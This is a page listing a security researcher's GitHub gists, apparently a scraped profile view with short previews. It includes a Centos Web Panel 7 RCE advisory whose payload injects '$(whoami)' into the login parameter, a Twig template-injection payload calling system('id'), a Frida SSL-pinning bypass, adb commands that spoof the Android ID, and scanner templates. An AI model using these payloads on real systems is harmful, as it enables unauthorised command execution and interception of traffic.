Skip to content

Instantly share code, notes, and snippets.

View numanturle's full-sized avatar
:bowtie:

numan numanturle

:bowtie:
View GitHub Profile
@numanturle
numanturle / waf.yaml
Created August 29, 2022 11:15
waf.yaml
id: waf-bypass-numi
info:
name: waf-bypass-numi
author: numanture
requests:
- raw:
- |
GET /blabla HTTP/1.1
# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap
POC
---------
@numanturle
numanturle / wait-for-it.sh
Last active June 27, 2025 04:28
wait-for-it.sh
#!/usr/bin/env bash
# Use this script to test if a given TCP host/port are available
WAITFORIT_cmdname=${0##*/}
echoerr() { if [[ $WAITFORIT_QUIET -ne 1 ]]; then echo "$@" 1>&2; fi }
usage()
{
cat << USAGE >&2
@numanturle
numanturle / # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
Created January 5, 2023 21:44
# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
@numanturle
numanturle / 1.twig
Created March 23, 2023 22:32
twig blacklist [ ]
{%set x={'1':'id'}%}{{x|filter('system')}}
@numanturle
numanturle / frida.js
Created May 3, 2023 10:50
ssl-root-bypass
setTimeout(function() {
Java.perform(function() {
console.log('');
console.log('======');
console.log('[#] Android Bypass for various Certificate Pinning methods [#]');
console.log('======');
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
var SSLContext = Java.use('javax.net.ssl.SSLContext');
adb shell content query --uri content://settings/secure --where "name=\'android_id\'"
adb shell content delete --uri content://settings/secure --where "name=\'android_id\'"
adb shell content insert --uri content://settings/secure --bind name:s:android_id --bind value:s:7373de1e9e9670c2
@numanturle
numanturle / cisco-ucs.yaml
Created June 22, 2023 09:00
Cisco UCS Director
id: cisco-ucs
info:
name: Cisco UCS Director
author: numanturle
severity: critical
tags: cisco,cisco imc,cisco-imc
requests:
- method: GET
snprintf(filename, PATH_MAX, "%s/%s", config->webroot, page); // vuln
@numanturle
numanturle / class.php
Created August 9, 2023 16:47
PHP SSRF Default
SoapClient
SplFileObject
tidy